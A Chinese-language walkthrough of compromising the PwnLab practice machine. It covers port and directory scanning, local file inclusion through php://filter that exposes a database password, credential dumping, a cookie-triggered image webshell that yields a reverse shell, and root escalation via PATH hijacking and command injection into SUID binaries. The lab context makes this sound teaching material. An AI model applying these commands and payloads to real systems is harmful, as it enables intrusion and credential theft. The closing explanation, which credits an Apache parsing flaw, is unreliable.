免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责
服务探测
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -p- 192.168.151.29 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:50 EST
Nmap scan report for 192.168.151.29
Host is up (0.22s latency).
Not shown: 65257 closed ports, 274 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
53955/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 94.55 seconds
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:52 EST
Nmap scan report for 192.168.151.29
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: mT<l1J`%6|5-#fZn=&BZ
|_ Auth Plugin Name: mysql_native_password
53955/tcp open status 1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 227.38 ms 192.168.49.1
2 227.59 ms 192.168.151.29
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.73 seconds
web
┌──(root💀kali)-[~/pg/PwnLab]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492
Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txt
Error Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.log
Target: http://192.168.151.29/
[07:55:55] Starting:
[07:57:33] 200 - 0B - /config.php
[07:57:59] 200 - 943B - /images/
[07:57:59] 301 - 317B - /images -> http://192.168.151.29/images/
[07:58:02] 200 - 332B - /index.php/login/
[07:58:02] 200 - 332B - /index.php
[07:58:09] 200 - 250B - /login.php
[07:58:59] 301 - 317B - /upload -> http://192.168.151.29/upload/
[07:59:00] 200 - 19B - /upload.php
[07:59:00] 200 - 743B - /upload/
跑出4个php文件,config.php,index.php,upload.php,login.php
两个文件夹images和upload
rpc
┌──(root💀kali)-[~/pg/PwnLab]
└─# rpcinfo 192.168.151.29 1 ⨯
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.137.210 status 106
100024 1 tcp 0.0.0.0.210.195 status 106
100024 1 udp6 ::.184.57 status 106
100024 1 tcp6 ::.170.192 status 106
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sSUC -p 111 192.168.151.29 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 08:05 EST
Nmap scan report for 192.168.151.29
Host is up (0.33s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
111/udp open|filtered rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
没什么特别有用的信息。
LFI
首页url格式是:
http://192.168.151.29/?page=
page后面现在只有两个参数login和uoload
使用php伪协议触发文件包含漏洞。
下面playload读取login源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login
页面打印
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==
base64 decode
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
$luser = $_POST['user'];
$lpass = base64_encode($_POST['pass']);
$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);
$stmt->execute();
$stmt->store_Result();
if ($stmt->num_rows == 1)
{
$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{
echo "Login failed.";
}
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
使用下面playload读取upload源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>
使用下面playload读取config源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
现在我们知道了mysql的账号密码,因为靶机开启了外放的mysql服务,我们可以从攻击机直接连接靶机mysql。
mysql
没有进入users数据库的权限
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.243 sec)
MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'
但是有查询users数据库的权限
MySQL [information_schema]> show grants;
+------------------------------------------------------------------+
| Grants for root@% |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `Users`.* TO 'root'@'%' |
+------------------------------------------------------------------+
2 rows in set (0.228 sec)
查询表名和表数据
MySQL [information_schema]> select * from tables where table_schema = 'Users';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| def | Users | users | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 10485760 | NULL | 2016-03-17 10:17:53 | NULL | NULL | latin1_swedish_ci | NULL | | |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
1 row in set (1.383 sec)
MySQL [information_schema]> select * from Users.users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.251 sec)
得到三组用户凭据:
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo
上面登录以后来到上传页面,各种绕过上传失败。。。
上面同样方法查看index.php文件
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
留意这行代码,包含了一个外部用户可以控制的cookie值,如果这个值变成我们的图片马就会触发文件解析漏洞
include("lang/".$_COOKIE['lang']);
事先把一张图片上传,用burpsuite截断,把rever_shell.php代码藏在图片数据里,得到一张图片马:ae3c0cf901daed40d3382c6c67c15a63.jpg
使用curl触发包含cookie,触发文件解析漏洞
┌──(root💀kali)-[~/pg/PwnLab]
└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php
* Trying 192.168.151.29:80...
* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.151.29
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg
>
收到反弹shell
└─# nc -lnvp 4242 130 ⨯
listening on [any] 4242 ...
connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
11:03:44 up 3:17, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
提权
我们上面拿到的用户凭据
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo
kent和kane可以通过上面的密码自由切换bash
在kane拿到local.txt
kane的家目录下还有个SUID:msgmike,属主是mike
用strings命令查看
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/mike/msg.txt
执行了一条cat /home/mike/msg.txt
可以通过劫持cat命令提权
把/home/kane写入$PATH
export PATH=/home/kane:$PATH
创建一个cat文件,并且给予执行权限
touch /home/kane/cat
chmod +x /home/kane/cat
把下面的shell写进/home/kane/cat
#!/bin/bash
bash -p
执行/home/kane/cat命令,提权到mike
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$whoami
whoami
mike
在mike的home目录里,有一个msg2root文件,也是一个SUID,属主是root,继续用strings命令查看
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /root/messages.txt
执行了一条/bin/echo %s >> /root/messages.txt命令
%s是我们输入的内容,因此同样可以劫持这条命令
Message for root: id & bash -p
id & bash -p
bash-4.3# id
bash-4.3# whoami
whoami
root
拿到proof.txt
bash-4.3# more proof.txt
more proof.txt
8ae5471d5970a5...
总结
上传的利用原理解释如下:
首先Apache的版本号是:2.4.10,apache的2.4.0~2.4.29存在一个解析漏洞,见这里
此靶机的漏洞利用就是使用了Apache HTTPD 多后缀解析漏洞
什么是多后缀解析漏洞?
如果一个文件里有php代码,那么只要访问的url里包含了.php后缀,那么这个文件都会被当成php文件解析,比如test.php.jpg
查看这台靶机的源代码,注意这行:
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
这里指定了上传后的文件名是源文件名的md5格式,后缀是白名单里允许的扩展名,所以正常情况我们无法绕过上传限制。
但是因为index.php里出现的这一行代码
include("lang/".$_COOKIE['lang']);
这个lang值我们是可以控制的(使用curl指定cookie值),现在只需要把lang值换成我们的图片马,那包含的图片马因为在一个php文件里面,所以就触发了apache的文件解析漏洞,被当成了php代码执行。
概念代码如下
<?php
include('evil.jpg');
?>
网友评论